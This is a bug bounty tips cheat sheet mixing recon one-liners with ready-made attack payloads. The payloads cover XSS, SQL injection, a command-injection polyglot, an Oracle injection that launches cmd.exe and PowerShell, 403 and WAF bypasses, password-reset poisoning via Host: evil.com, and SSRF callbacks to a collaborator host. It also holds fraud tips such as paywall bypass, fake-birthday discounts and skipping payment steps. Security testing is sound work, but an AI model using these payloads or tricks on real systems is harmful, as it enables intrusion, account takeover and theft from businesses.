Bug Bounty Tips: | Github | Twitter | Recon | Payload |
Google the company copyright footer to get more domains.
Use whoxy.com to perform reverse whois lookups with the email used to register the main domain/
Search for slide,docs,demos and video tutorials by your target. Manny innocent examples could leak juicy endpoints.
Use OpenSSL to get certificates. They can contain valuable info and common names form finding more subdomains.
Try to recreate data from deleted accounts by siging up with the old email address.
Check text version of HTML e-mail for template injections
When testing Rails Application add .json to url endpoints.
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/
Subdomain Enumeration
sublist3r -d $1 -o $1.txt
mkdir thirdlevel
echo "Gathering full third-level domain with sublister"
for domain in $(cat $1.txt); do sublist3r -d $domain -o thirdlevel/$domain.txt; cat thirdlevel/$domain.txt | sort -u >> final.txt; done
echo "Probing for alive third-levels..."
cat final.txt | httprobe > probed.txt
subdomain level extraction
Regex pattern | Domain level match |
grep -P ‘^(?:[a-z0-9]+.){1}[^.]*$’ | 2nd level domains only |
grep -P ‘^(?:[a-z0-9]+.){2}[^.]*$’ | 3rd level domains only |
grep -P ‘^(?:[a-z0-9]+.){2,}[^.]*$’ | 3rd level domains or higher |
grep -P ‘^(?:[a-z0-9]+.){2,3}[^.]*$’ | 3rd to 4th level domains only |
grep -P ‘^(?:[a-z0-9]+.){3,}[^.]*$’ | 4th level domains or higher |
Check live
cat GREPABLENMAP.gnmap | grep 443/open | cut -d "(" -f 1 | cut -d : -f 2| tr -d " " | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\*\.?##' | sed -E 's#,#\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\/\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew
Check live webapps from sublis3r
cat subdomains.txt | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\*\.?##' | sed -E 's#,#\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\/\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew
Filter ffuf output
cat * | jq | grep "url\"" | grep -v "replayproxyurl" |grep -v "proxyurl" | grep -v "FUZZ" | cut -d \" -f4
Use exiftool to extract metadata from documents, it might reveal vulnerable htmltopdf generators
Use cloud_enum to find open google buckets or azure accounts
Use Grep to extract endpoints with grep: grep -o -E '(https?://)?/?[{}a-z0-9A-Z_\.-]{2,}/[{}/a-z0-9A-Z_\.-]+'
Use WayBackmachine combined with paraminer or parameth
Passive parameter mining web.archive.org /cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey
Inject payloads in parameter names, ?<script>alerty</script>=true
Use youtube(olx, etc...) videos with xss in names.
Use round brackets to inject payload into valid e-mail address.
X-Forwarded-For: ${payload}
Use longstring parameters for stacktrace.
WAFBYPASS ?page=";confirm`1`// Rightwards -> 302; ?pag%65=";confirm`1`// Rightwards -> 200 + XSS!
Redirect bypass %26next=http://example.com
When testing nodejs site add %ff at the end of url https://target.com/%ff, most of times cause error and return stacktrace with full path
Add [] to name of parrameter: pwd= ->pwd[]=
when interacting with db try to put % in parameter ?item=%
Authentication & Autorization
UUID Idor Trick, Register user with the same name, it maybe return uuid.
Try to bruteforce login endpoint. /login/${oauth_provider}, login/facebook, login/oauth/twitter login/oauth/v2/yahoo
403 Forbidden bypass, https://host.com/path =403, https://host.com/%2e/path = 200,
Bypass paywalls by using Google Bot user agent.
User securitytrails.com to find the originating server IP
Do match and replace form false to true.
Set your birthday for today ot tomorrow to get discounts.
Skip steps: /step/shipping -> ~~/step/payment~~ -> /step/confirm
Check does blackfriday coupon codes expires.
Use blind xss as password.
Login to site using Facebook and try tochange userid during POST requests
/api/v1/users/profile?id=MYID&id=ANOTHERUSERID -> HTTP 200
Email Restriction bypass
→ inti(;
→ inti@inti.io → my inbox!
→ ;)@whitelisted.com
● inti@inti.io(@whitelisted.com)
● inti+(@whitelisted.com;)@inti.io
Email Address input fuzz
"'OR 1=1--"@example.com
"mail');DROP TABLE users;--"@example.com
"%0d%0aContent-Lenght:%200@0d%0a%0d%0a"@example.com"recipient@test.com>\r\nRCPT TO:<victim+"@test.com
Account takeover via Email
GET /passwordreset
Double parameter (aka. HPP / HTTP parameter pollution):
Carbon copy:
Using separators:
No domain:
No TLD (Top Level Domain):
JSON table:
Password Reset:
reset userpassword: user@email.com.burpcolaborator.com
Find GET parameters in example.com
assetfinder example.com | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done
Command injection polyglot
/*$(ping -c 2 example.com)`ping -c 2 example.com``*/-ping -c 2 example.com-'/*$(ping -c 2 example.com)`ping -c 2 example.com` #*/-ping -c 2 example.com||'"||ping -c 2 example.com||"/*`*/
/*$(echo 1 >/tmp/rce1)`echo 1 >/tmp/rce1``*/-echo 1 >/tmp/rce1-'/*$(echo 1 >/tmp/rce1)`echo 1 >/tmp/rce1` #*/-echo 1 >/tmp/rce1||'"||echo 1 >/tmp/rce1||"/*`*/
SSRF Bypass list for localhost (
Top 25 SSRF parameters
Top 25 RCE parameters
?cmd={payload} ?exec={payload} ?command={payload} ?execute{payload} ?ping={payload} ?query={payload} ?jump={payload} ?code={payload} ?reg={payload} ?do={payload} ?func={payload} ?arg={payload} ?option={payload} ?load={payload} ?process={payload} ?step={payload} ?read={payload} ?function={payload} ?req={payload} ?feature={payload} ?exe={payload} ?module={payload} ?payload={payload} ?run={payload} ?print={payload}
Top 25 LFI parameters
?cat={payload} ?dir={payload} ?action={payload} ?board={payload} ?date={payload} ?detail={payload} ?file={payload} ?download={payload} ?path={payload} ?folder={payload} ?prefix={payload} ?include={payload} ?page={payload} ?inc={payload} ?locate={payload} ?show={payload} ?doc={payload} ?site={payload} ?type={payload} ?view={payload} ?content={payload} ?document={payload} ?layout={payload} ?mod={payload} ?conf={payload}
HackerOne redirect parameters
/[redirect] ?targetOrigin=[redirect] ?fallback=[redirect] ?query=[redirect] ?redirection_url=[redirect] ?next=[redirect] ?ref_url=[redirect] ?state=[redirect] ?l=[redirect] ?redirect_uri=[redirect] ?forum_reg=[redirect] ?return_to=[redirect] ?redirect_url=[redirect] ?return_url=[redirect] ?host=[redirect] ?url=[redirect] ?redirectto=[redirect] ?return=[redirect] ?prejoin_data=[redirect] ?callback_url=[redirect] ?path=[redirect] ?authorize_callback=[redirect] ?email=[redirect] ?origin=[redirect] ?continue=[redirect] ?domain_name=[redirect] ?redir=[redirect] ?wp_http_referer=[redirect] ?endpoint=[redirect] ?shop=[redirect] ?qpt_question_url=[redirect] ?checkout_url=[redirect] ?ref_url=[redirect] ?redirect_to=[redirect] ?succUrl=[redirect] ?file=[redirect] ?link=[redirect] ?referrer=[redirect] ?recipient=[redirect] ?redirect=[redirect] ?u=[redirect] ?hostname=[redirect] ?returnTo=[redirect] ?return_path=[redirect] ?image=[redirect] ?requestTokenAndRedirect=[redirect] ?retURL=[redirect] ?next_url=[redirect]
Massive XSS
# $1 => example.domain
subfinder -d $1 -o domains_subfinder_$1
amass enum --passive -d $1 -o domains_$1
cat domains_subfinder_$1 | tee -a domains_$1
cat domains_$1 | filter-resolved | tee -a domains_$1.txt
cat domains_$1.txt | ~/go/bin/httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt
Masive Top Parameters search
echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew
Juicy GoogleDorks
site:example.com inurl:.cgi?
File Upload and what to search
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
SVG: Stored XSS / SSRF / XXE
GIF: Stored XSS / SSRF
CSV: CSV injection
HTML / JS : HTML injection / XSS / Open redirect
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
File upload chain
../../../tmp/lol.png —> for path traversal
sleep(10)-- -.jpg —> for SQL injection
<svg onload=alert(document.domain)>.jpg/png —> for XSS
; sleep 10; —> for command injections
Find JavaScript Files in Target.com
echo target.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'
cat domains | httpx -silent | subjs | anew
Extract endpoints from *.js
cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u
Extract juicy data from js
cat hosts | httpx -silent | subjs | anew | httpx -silent -sr -mc 200
grep -EHirn "accesskey|admn|aes|api_key|apikey|password|secret|token" ./output --color
403 bypass
https://target.com/admin/ –> HTTP 302 (redirect to login page)
https://target.com/admin..;/ –> HTTP 200 OK
site.com/secret –> HTTP 403 Forbidden
site.com/secret/ –> HTTP 200 OK
site.com/secret/. –> HTTP 200 OK
site.com//secret// –> HTTP 200 OK
site.com/./secret/.. –> HTTP 200 OK
X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin
Data leakage through .json
Here’s a tip to achieve sensitive data leak using .json extension.
GET /ResetPassword HTTP/1.1
HTTP/1.1 200 OK
Now let’s try this instead:
GET /ResetPassword.json HTTP/1.1
HTTP/1.1 200 OK
Generate wordlist for target
echo "bugcrowd.com" | subfinder -silent | hakrawler -plain -usewayback -scope yolo | sed $'s/[./?=:&#]/\\n/g' | anew
Check for SQLi
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
SQLi in Email parameter
Payload | Response | Injection Status |
{“email”:”asd@a.com”} | {“code”:2002,”status”:200,”message”:”Email not found.”} | Valid |
{“email”:”asd a@a.com”} | {“code”:2002,”status”:200,”message”:”Bad format”} | Not Valid |
{“email”:”\”asd a\”@a.com”} | {“code”:2002,”status”:200,”message”:”Bad format”} | Not Valid |
{“email”:”asd(a)@a.com”} | {“code”:2002,”status”:200,”message”:”Bad format”} | Not Valid |
{“email”:”\”asd(a)\”@a.com”} | {“code”:2002,”status”:200,”message”:”Email not found.”} | Valid |
{“email”:”asd’a@a.com”} | {“code”:0,”status”:500,”message”:”Unspecified error”} | Not Valid |
{“email”:”asd’or’1’=’1@a.com”} | {“code”:2002,”status”:200,”message”:”Email not found.”} Valid | |
{“email”:”a’-IF(LENGTH(database())>9,SLEEP(7),0)or’1’=’1@a.com”} | {“code”:2002,”status”:200,”message”:”Bad format”} | Not Valid |
{“email”:”\”a’-IF(LENGTH(database())>9,SLEEP(7),0)or’1’=’1\”@a.com”} | {“code”:0,”status”:200,”message”:”Successful”} | Valid Delay: 7,854 milis |
{“email”:”\”a’-IF(LENGTH(database())=10,SLEEP(7),0)or’1’=’1\”@a.com”} | {“code”:0,”status”:200,”message”:”Successful”} | Valid Delay: 8,696 milis |
{“email”:”\”a’-IF(LENGTH(database())=11,SLEEP(7),0)or’1’=’1\”@a.com”} | {“code”:0,”status”:200,”message”:”Successful”} | Valid No delay |
1) UNION SELECT CASE WHEN (SELECT ASCII(SUBSTR((SELECT user FROM dual), 1, 1 )) FROM dual) >71 THEN (dbms_pipe.receive_message(('a'),10)) ELSE NULL END FROM dual --
1' AND 1=2 UNION SELECT SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''exec4'',''EXECUTABLE'',''c:\\WINDOWS\\system32\\cmd.exe /c type C:\\users\\public\\shell.ps1 | PowerShell.exe -noprofile - '',0,TRUE);DBMS_SCHEDULER.create_job(job_name=>''myjob11'',program_name=>''exec4'',start_date=>NULL,repeat_interval=>NULL,end_date=>NULL,enabled=>TRUE,auto_drop=>TRUE);dbms_lock.sleep(1);dbms_scheduler.drop_program(program_name=>''exec4'');dbms_scheduler.purge_log;'), null FROM DUAL --
1' AND 1=1 UNION SELECT null, user FROM DUAL --
Cool BurpPlugins
Autorize – To test BACs (Broken Access Control)
Burp Bounty – Profile-based scanner
Active Scan++ – Add more power to Burp’s Active Scanner
AuthMatrix – Authorization/PrivEsc checks
Broken Link Hijacking – For BLH (Broken Link Hijacking)
Collaborator Everywhere – Pingback/SSRF (Server-Side Request Forgery)
Command Injection Attacker
Content-Type Converter – Trying to bypass certain restrictions by changing Content-Type
Decoder Improved – More decoder features
Freddy – Deserialization
Flow – Better HTTP history
Hackvertor – Handy type conversion
HTTP Request Smuggler
Hunt – Potential vuln identifier
InQL – GraphQL Introspection testing
J2EE Scan – Scanning J2EE apps
JSON/JS Beautifier
JSON Web Token Attacker
ParamMiner – Mine hidden parameters
Reflected File Download Checker
Reflected Parameter – Potential reflection
SAML Raider – SAML testing
Upload Scanner – File upload tester
Web Cache Deception Scanner
Detect framework via favico
cat urls.txt | python3 favfreak.py -o output
Password Poisoning
(1) Normal request:
POST /password-reset?user=123 HTTP/1.1
Host: target.com
Link received:
(2) Basic HHI (Host Header Injection):
POST /password-reset?user=123 HTTP/1.1
Host: evil.com
Link received:
Error 404 - request blocked
(3) Bypass technique:
POST https://target.com/password-reset?user=123 HTTP/1.1
Host: evil.com
Link received:
Find hostsname form given IP
echo | cero
XSS Post Message POC
Vulnerable PostMessage <script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script> <script> window.addEventListener("message", (event) => { console.log(event.data); $(event.data) }, false); </script> Exploit <!DOCTYPE html> <html> <head> </head> <body> <script> var myWindow = window.open("http://example.com/test.html") </script> <script> setInterval(function(){myWindow.postMessage("<img src=x onerror=alert(123);>","*");},3000); window.onmessage = function (e) { console.log(e); }; </script> </body> </html>
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil'
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil'
Xray Oneliner
xargs -a urls.txt -I@ sh -c './xray webscan --plugins cmd-injection,sqldet,xss --url "@" --html-output vuln.html'
xargs -a urls.txt -I@ sh -c './xray webscan --plugins cmd-injection,sqldet,xss --url "@" --html-output vuln.html'
Katana crawling
subfinder -d hackerone.com -silent -all | httpx -silent | katana -d 5 -silent | grep -iE '\.js'| grep -iEv '(\.jsp|\.json)'
subfinder -d hackerone.com -silent -all | httpx -silent | katana -d 5 -silent -em js,jsp,json
subfinder -d hackerone.com -silent -all | httpx -silent | katana -d 5 -silent | grep -iE '\.js'| grep -iEv '(\.jsp|\.json)'
subfinder -d hackerone.com -silent -all | httpx -silent | katana -d 5 -silent -em js,jsp,json
Scan All domains using Knoxss
- [Explained command]
echo "dominio" | subfinder -silent | gau | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss.me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIDOKNOXSS\""}' | sh
echo "dominio" | subfinder -silent | gau | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss.me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIDOKNOXSS\""}' | sh
Scan All github repo ORG
- [Explained command]
docker run --rm mswell/masstrufflehog -o paypal
docker run --rm mswell/masstrufflehog -o paypal
Scan log4j using BBRF and log4j-scan
bbrf domains | httpx -silent | xargs -I@ sh -c 'python3 http://log4j-scan.py -u "@"'
bbrf domains | httpx -silent | xargs -I@ sh -c 'python3 http://log4j-scan.py -u "@"'
SSTI in qsreplase add "{{7*7}}" (0xJin)
cat subdomains.txt | httpx -silent -status-code | gau --threads 200 | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt
ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy
cat subdomains.txt | httpx -silent -status-code | gau --threads 200 | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt
ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy
urldedupe bhedak
- [Explained command]
waybackurls testphp.vulnweb.com | urldedupe -qs | bhedak '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not'
waybackurls testphp.vulnweb.com | urldedupe -qs | bhedak '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not'
Hakrawler Airixss XSS
- [Explained command]
echo testphp.vulnweb.com | httpx -silent | hakrawler -subs | grep "=" | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not'
echo testphp.vulnweb.com | httpx -silent | hakrawler -subs | grep "=" | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not'
Airixss XSS
- [Explained command]
echo testphp.vulnweb.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
echo testphp.vulnweb.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
- [Explained command]
echo testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq | egrep -v 'Not'
echo testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq | egrep -v 'Not'
- [Explained command]
cat urls | bhedak "\"><svg/onload=alert(1)>*'/---+{{7*7}}"
cat urls | bhedak "\"><svg/onload=alert(1)>*'/---+{{7*7}}"
.bashrc shortcut OFJAAAH
gau -subs $1 |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt
curl -s "[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew
curl -s "[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew
gau -subs $1 |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt
curl -s "[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew
curl -s "[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew
Oneliner Haklistgen
- @hakluke
subfinder -silent -d domain | anew subdomains.txt | httpx -silent | anew urls.txt | hakrawler | anew endpoints.txt | while read url; do curl $url --insecure | haklistgen | anew wordlist.txt; done
cat subdomains.txt urls.txt endpoints.txt | haklistgen | anew wordlist.txt;
subfinder -silent -d domain | anew subdomains.txt | httpx -silent | anew urls.txt | hakrawler | anew endpoints.txt | while read url; do curl $url --insecure | haklistgen | anew wordlist.txt; done
cat subdomains.txt urls.txt endpoints.txt | haklistgen | anew wordlist.txt;
Running JavaScript on each page send to proxy.
- [Explained command]
cat 200http | page-fetch --javascript '[...document.querySelectorAll("a")].map(n => n.href)' --proxy
cat 200http | page-fetch --javascript '[...document.querySelectorAll("a")].map(n => n.href)' --proxy
Running cariddi to Crawler
- [Explained command]
echo tesla.com | subfinder -silent | httpx -silent | cariddi -intensive
echo tesla.com | subfinder -silent | httpx -silent | cariddi -intensive
Dalfox scan to bugbounty targets.
- [Explained command]
xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer'
xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer'
Dalfox scan to bugbounty targets.
- [Explained command]
wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
Using x8 to Hidden parameters discovery
- [Explaining command]
assetfinder domain | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate'
assetfinder domain | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate'
Extract .js Subdomains
- [Explaining command]
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
goop to search .git files.
- [Explaining command]
xargs -a xss -P10 -I@ sh -c 'goop @'
xargs -a xss -P10 -I@ sh -c 'goop @'
Using chaos list to enumerate endpoint
curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @'
curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @'
Using Wingman to search XSS reflect / DOM XSS
- [Explaining command]
xargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify'
xargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify'
Search ASN to metabigor and resolvers domain
- [Explaining command]
echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'
echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'
Search .json gospider filter anti-burl
- [Explaining command]
gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl
gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl
Search .json subdomain
- [Explaining command]
assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew
assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew
SonarDNS extract subdomains
- [Explaining command]
wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar
wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar
Kxss to search param XSS
- [Explaining command]
echo http://testphp.vulnweb.com/ | waybackurls | kxss
echo http://testphp.vulnweb.com/ | waybackurls | kxss
Recon subdomains and gau to search vuls DalFox
- [Explaining command]
assetfinder testphp.vulnweb.com | gau | dalfox pipe
assetfinder testphp.vulnweb.com | gau | dalfox pipe
Recon subdomains and Screenshot to URL using gowitness
- [Explaining command]
assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
Extract urls to source code comments
- [Explaining command]
cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
Axiom recon "complete"
- [Explaining command]
findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u
findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u
Domain subdomain extraction
- [Explaining command]
cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain'
cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain'
Search .js using
- [Explaining command]
assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew
assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew
This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below.
- [Explaining command]
cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS'
cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS'
My recon automation simple. OFJAAAH.sh
- [Explaining command]
chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1
chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1
Download all domains to bounty chaos
- [Explaining command]
curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH'
curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH'
Recon to search SSRF Test
- [Explaining command]
findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net
findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net
ShuffleDNS to domains in file scan nuclei.
- [Explaining command]
xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1
xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1
Search Asn Amass
- [Explaining command]
Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me)
